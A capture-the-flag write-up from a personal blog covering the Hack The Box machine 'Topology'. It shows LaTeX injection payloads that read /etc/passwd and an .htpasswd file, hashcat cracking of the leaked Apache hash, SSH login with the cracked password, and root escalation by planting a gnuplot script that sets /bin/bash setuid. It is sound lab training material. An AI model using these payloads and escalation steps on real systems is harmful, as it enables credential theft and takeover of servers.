The Be Sure Blog

Code Snippets | Problem Solving | Tips & Tricks

The Be Sure Blog banner

Topology: Use LaTeX Injection and Hashcat

posted on 17.8.2023 by Below Surface in "Hack The Box"

sudo nmap -sCV 10.10.11.217

Reveals:

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 dc:bc:32:86:e8:e8:45:78:10:bc:2b:5d:bf:0f:55:c6 (RSA)
|   256 d9:f3:39:69:2c:6c:27:f1:a9:2d:50:6c:a7:9f:1c:33 (ECDSA)
|_  256 4c:a6:50:75:d0:93:4f:9c:4a:1b:89:0a:7a:27:08:d7 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Miskatonic University | Topology Group
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Since port 80 is open and we get a HTTP title, let's paste the IP into our browser. A website loads. From the displayed email addresses we see that the URL should be

topology.htb

Let's add this to our local hosts file:

sudo nano /etc/hosts

Add:

10.10.11.217 topology.htb

Then save and exit the editor.

When we view the page content further, we discover a link to a PHP page:

http://latex.topology.htb/equation.php

But the link does not work yet, we also need to put it into our hosts file with the servers IP address:

10.10.11.217 latex.topology.htb

Now it works!

We can use GoBuster to find more subdomains:

sudo gobuster vhost -u http://topology.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain

Output:

Found: dev.topology.htb Status: 401 [Size: 463]
Found: stats.topology.htb Status: 200 [Size: 108]

Add them to the hosts file, as we did before.

Also, let's search for pages and directories:

gobuster dir --url http://10.10.11.217 --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x html,php

Output:

/.html                (Status: 403) [Size: 277]
/.php                 (Status: 403) [Size: 277]
/images               (Status: 301) [Size: 313] [--> http://10.10.11.217/images/]
/index.html           (Status: 200) [Size: 6767]
/css                  (Status: 301) [Size: 310] [--> http://10.10.11.217/css/]
/javascript           (Status: 301) [Size: 317] [--> http://10.10.11.217/javascript/]
/portraits            (Status: 301) [Size: 316] [--> http://10.10.11.217/portraits/]

Let's focus on the equation.php page now. We can provide some input and the website will generate an image from the provided input. This can be exploited, because we can run bash commands here (see the hacktricks link below for more information about this exploit). The following command will output an image of the passwd file of the target system:

$\lstinputlisting{/etc/passwd}$

However, there are no credentials included. From out previous research, we also know the URL:

dev.topology.htb

So, let's see if we can grab anything from there.

$\lstinputlisting{/var/www/dev/.htpasswd}$

This command outputs us:

vdaisley:$apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0

Which is a user name with their password hash. ChatGPT tells us, that this is an Apache specific "MD5 apr1" password hash.

$apr1$salt$hashed_password


    

  • apr1 indicates the algorithm used (Apache's MD5-based algorithm).
    • 

  • salt is the randomly generated salt used in the hashing process.
    • 

  • hashed_password is the actual hashed password.

Let's crack that with Hashcat. Find a table for the hash mode (-m) here: https://hashcat.net/wiki/doku.php?id=example_hashes.

hashcat -m 1600 -a 0 '$apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0' /usr/share/wordlists/rockyou.txt

Relevant output:

$apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0:calculus20   
Status...........: Cracked

Out login data will be used now to SSH into the server:

ssh vdaisley@10.10.11.217
password: calculus20

Success!

cat user.txt


Time for privilege escalation.

whoami
vdaisley

We will use SCP to upload a tool called "pspy" from our local machine, which we downloaded from: https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64. Create a new folder called temp, then exit the SSH connection and upload the pspy64 file with SCP:

mkdir temp
exit
scp Downloads/pspy64 vdaisley@10.10.11.217:~/temp
password: calculus20
ssh vdaisley@10.10.11.217
cd temp
chmod +x pspy64
./pspy64

Now we can see running processes with our limited privileges. Just wait for a while for pspy to gather information on the running events. One thing that regularly pops up, is /opt/gnuplot.

2023/08/17 04:46:01 CMD: UID=0     PID=5416   | /bin/sh -c find "/opt/gnuplot" -name "*.plt" -exec gnuplot {} ;

We see that gnuplot will execute any .plt files as root, so this is what we will try to exploit now. Our goal is to get a root shell with our privilege escalation.

nano /opt/gnuplot/escalation.plt

Insert:

chmod u+s /bin/bash

Then save and exit the editor. When monitoring the system processes with pspy again, we see that our file escalation.plt gets executed!

2023/08/17 04:59:01 CMD: UID=0     PID=5749   | gnuplot /opt/gnuplot/escalation.plt

Which means, we can now do the final step of privilege escalation:

/bin/bash -p
whoami
-> root

Then we search for the root.txt file:

find / -name root.txt 2>/dev/null
cat /root/root.txt

Finished!

Tags:

hack the box
latex injection
hashcat
hash cracking
password recovery
privilige escalation

Sources:

https://app.hackthebox.com/machines/Topologyhttps://medium.com/@error.not.known.404/topology-easy-ctf-hackthebox-99b485c380dchttps://book.hacktricks.xyz/pentesting-web/formula-doc-latex-injectionhttps://hashcat.net/wiki/doku.php?id=example_hashes

More posts of this category

Meow: How to pwn the machine (Nmap, Telnet)

Use nmap and telnet to get the flag

Hack The Box

Fawn: Pwn the machine (FTP)

Find the open FTP port and extract the flag!

Hack The Box

Dancing: Pwn the machine (SMB)

How to retrieve the flag with SMB (Server-Message-Block)

Hack The Box

Redeemer: Pwn the machine and capture the flag (Redis)

How to get the flag from the Redis database

Hack The Box

Appointment: Use SQL-Injection to pwn the machine

How to extract the flag by logging in without a password

Hack The Box

Sequel: Access a MariaDB instance with default credentials

Scan for the open ports, log into the database and get the flag!

Hack The Box

Crocodile: Capture the flag! (FTP, Gobuster)

Get credentials via the open FTP port and use Gobuster to find the login file

Hack The Box

Responder: Crack the password hash and login as admin

Use Nmap, modify the hosts file and exploit LFI to grab the hash and crack it

Hack The Box

Three: Get a reverse shell via AWS S3

Use Nmap, Gobuster, Ncat, PHP and the AWS CLI to capture the flag

Hack The Box

Archetype: From user to admin

Make good use of nmap, smbclient, mssqlclient, xp_cmdshell, winPEAS & psexec

Hack The Box

Oopsie: Modify the login cookie, escalate privileges and get the flag!

Upload a PHP reverse shell, get user and then root privileges to pwn the machine

Hack The Box

Vaccine: Pwn the machine (zip2john, hashcat, sqlmap)

Crack the .zip archive, use sql injection and escalate your privileges to get the flags

Hack The Box

Unified: Exploit Log4j, modify a MongoDB entry and get the flags

Log4j exploitation, HTTP request modification & privilege escalation

Hack The Box

Explosion: Use xfreerdp to connect to the service

Make use of the poorly configured service and get the flag

Hack The Box

Preignition: Use Gobuster and default credentials

Gobuster is used to find the login page of the server by dir busting

Hack The Box

Mongod: Use the MongoDB cli to get the flag

MongoDB is a NoSQL database. Use the mongo cli to pwn the machine

Hack The Box

Synced: Use Rsync to browse public shares

Rsync is a fast file copying tool. We will use it to download the flag

Hack The Box

Ignition: Use Gobuster and a common used password

Modify the hosts file, do dir busting and try common passwords to get the flag

Hack The Box

Bike: Exploit a Node.js template engine vulnerability

Insert malicious code to leave the sandbox and get the flag!

Hack The Box

Funnel: Use local port forwarding to access the PostgreSQL DB

Since we can't interact with the DB directly, we use tunneling

Hack The Box

Pennyworth: Remote command execution vulnerability

Default credentials help us to execute Groovy Script code to get a reverse shell

Hack The Box

Tactics: Get the flag via Samba Client or psexec.py

Browse the Windows shares with default credentials and extract the flag

Hack The Box

Included: Local file inclusion, reverse shell and privilege escalation

Use TFTP, get a reverse shell, build and upload an Alpine image with root

Hack The Box

Markup: Use XXE Injection and privilege escalation to get the flag

Nmap, BurpSuite, Ncat, default credentials and misconfigurations

Hack The Box

Base: PHP Type Juggling, Arbitrary File Upload, clear text credentials

Use BurpSuite, Netcat, SSH, Gobuster and PHP to get a reverse shell

Hack The Box

Sau: Use Server Side Request Forgery to pwn the machine

Exploit known vulnerabilities and capture the flags

Hack The Box

Pilgrimage: Use various exploits to get the two flags

Git Repo Dump, Arbitrary File Read, Remote Code Execution

Hack The Box

MonitorsTwo: Use two exploits, crack the BCrypt hash and escalate privileges

Get a reverse shell, break out of a Docker container and get the flags

Hack The Box